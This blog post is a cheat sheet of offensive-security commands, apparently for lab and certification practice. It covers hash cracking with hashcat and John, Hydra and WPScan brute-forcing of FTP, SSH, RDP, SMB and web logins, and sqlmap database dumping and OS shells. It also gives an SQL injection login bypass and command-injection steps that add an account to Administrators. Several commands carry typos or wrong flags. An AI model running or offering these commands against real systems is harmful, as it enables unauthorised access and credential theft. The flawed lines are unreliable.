Technical

Bug Bounty Tools & Usage

by Aarsh 0 comment 
Hashcat Tool
Dictionary Attack

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
  -m 0 designates the type of hash we are cracking (MD5);
  -a 0 designates a dictionary attack;
  -o cracked.txt is the output file for the cracked passwords;
  -target_hashes.txt is our input file of hashes;
  -/usr/share/wordlists/rockyou.txt = Path to the wordlist
 
 m - 0:MD5
     100:SHA1
     1400:SHA256
     1700:SHA512
     900:MD4
     3200:BCRYPT

Also Important to check hash
#hash-identifier
#hash -m [file]

 

HYDRA Tool
FOR FTP

If username is already given = hydra -l samson -P -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

If password is given and needs to find username = hydra -L user.txt -p 123 192.168.1.101 ftp

If both username and password is not given = hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

Reference = https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/

FOR SSH

hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 -t 4 ssh

FOR HTTP FORM

hydra -L [user] -P [password] [IP] http-post-form "/:usernam=^USER^ & password=^PASS^:F=incorrect" -V

 

John The Ripper
Single crack mode: john --single --format=raw-sha1 crack.txt
Crack the password in file using wordlist: john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt (Crack.txt here contains the hashes)

Cracking service credentials like ssh

1. First have to convert the hash file to JOHN format : ssh2john /home/text/.ssh/id_rsa > crack.txt (Now we need to crack this crack.txt file with John The Ripper)
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

To crack ZIP

1. zip2john file.zip > crack.txt
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt



Notes:
–wordlist can be written as -w also

john crack.txt --wordlist=rockyou.txt --format=Raw-SHA256

 

NMAP

nmap -sV -sC -oA nmap.txt 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.x
nmap -sS -P0 -A -v 10.10.10.x
masscan -e tun0 -pi-65535 --rate=1000
nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.x

nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24 
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1

nmap -f IP
nmap -sn -PR IP
nmap -sn -PE ip-range
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O IP
nmap -A IP

-sn disable port scan
-PR ARP ping scan
-PU UDP ping scan
-PE ICMP ECHO ping scan
-f  Splits IP into fragment packets

nmap --script smb-os-discovery.nse IP 
Displays OS, Computer-Name, Domain, WorkGroup and Ports.

 

SQLMAP

URL = http://testphp.vulnweb.com/artists.php?artist=1

Find DBs = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

Result is DB name acuart

Find Tables = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch

Result is table name users

Find columns = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

Dump table = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

Dump the DB = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch



Reference = https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

Using cookies
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx' --random-agent --level=1 --risk=3 --dbs --batch

SQL Injection

in login page enter blah' or 1=1-- as username and click login without entering the password

OS Shell = sqlmap -u 'url' --dbms=mysql --os-shell
SQL Shell = sqlmap -u 'url' --dbms=mysql --sql-shell

==============================================================================================

OWASP ZAP
Open the ZAP 
Add the webiste name to Autoscan
Click on the Alert tab to know about Vulnerabilities

---------------------------------------------------------------------------------------------------------------------------------------------------------

SQL MAP

Open the vulnerable website 
Copy the cookie from the inspect element
Open the terminal to use sqlmap 
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

You will get all the Useraname and Passwords of the website.

------------------------------------------------------------------------------------------------------------------------------------------------------

sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the Interactive OS shell.

-------------------------------------------------------------------------------------------------------------------------------------------------------

mysql -U qdpmadmin -h 192.168.1.8 -P passwod 
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;

When you have username and Password for the database.

-------------------------------------------------------------------------------------------------------------------------------------------------------

 

WPSCAN

User Enumeration : wpscan --url https://example/ --enumerate u
Bruteforce: wpscan --url https://example/ --passwords wordlist.txt --usernames samson

wpscan --url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt
wpscan --url https://example/ --enumerate u (To enumerate the user)

 

Wireshark

To find DOS (SYN and ACK) : tcp.flags.syn == 1  , tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords : http.request.method == POST
More reference: https://www.comparitech.com/net-admin/wireshark-cheat-sheet/

To find DOS: Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port(As per question)

 

Stenography

snow.exe -C -p "test" confidential.txt

-C  compressing / uncompressing
-p  password


Open Stego 
GUI tool

 

Domain Enumeration

NET USERS /DOMAIN >USERS.TXT
Domain: TEST.local
User Enumeration:
  Windows:
    net user
    net user /domain
    net user [username]
    net user [username] /domain

 

SNMP Enumeration

nmap -sU -P 161 IP
snmp-check IP
Displays Network Info, Network Interfaces, Network IP, Routing Info, TCP connection and listening, process, Storage info, File System and Device Info.


NetBios Enumeration

nbstat -a IP
-a netbios name table
-c list contents of Netbios name cache

net use
Displays connection status, Shared folder/drive and Network Information.

 

Hash identifier and Hash cracking

Hash Identifier
https://www.onlinehashcrack.com/hash-identification.php

Hash-identifier (CLI)

Hash Crack
https://crackstation.net/
https://hashes.com/en/decrypt/hash

Hashcat -a 3 -m 900 hash.txt /rockyou.txt

-a attack mode
-m hashtype
900 md4
1000 NTLM
1800 SHA512CRYPT
110 SHA1 with SALT HASH
0  MD5
100 SHA1
1400 SHA256
3200 BCRYPT
160 HMAC-SHA1

John 
1. First analyze hash type - `john hashfile.hash`
2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash


Hydra

- **FTP**: hydra -l user -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
    
            hydra -L userlist.txt -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
    
- SSH: hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh
- Post Web Form: hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

- `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
- `hydra -l root -P passwords.txt [-t 32] <IP> ftp
- `hydra -L usernames.txt -P pass.txt <IP> mysql
- `hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`
- `hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>`
- `hydra -P common-snmp-community-strings.txt target.com snmp
- `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
- `hydra -l root -P passwords.txt <IP> ssh

 

command Injection

Login to DVWA
Set the Security Level "Low"
Click on the Command Injection Tab 
Check the parameter is vulnerable or not and it is vulnerable 
Now enter the system cmd's
| hostname
| whoami
| dir C:\path.txt
| type path.txt

| net user
| net user Test /Add
| net user
| net user Test
| net localgroup Administrators Test /Add

Succefully created the "Test" user account.

 

 

 

0 comment
0
FacebookTwitterPinterestEmail

Related Posts

Hacking Modules and Notes

The Ultimate WordPress Security Guide – Step by...

How to Install Counter Strike Global Offensive Server...

Leave a Comment

Save my name, email, and website in this browser for the next time I comment.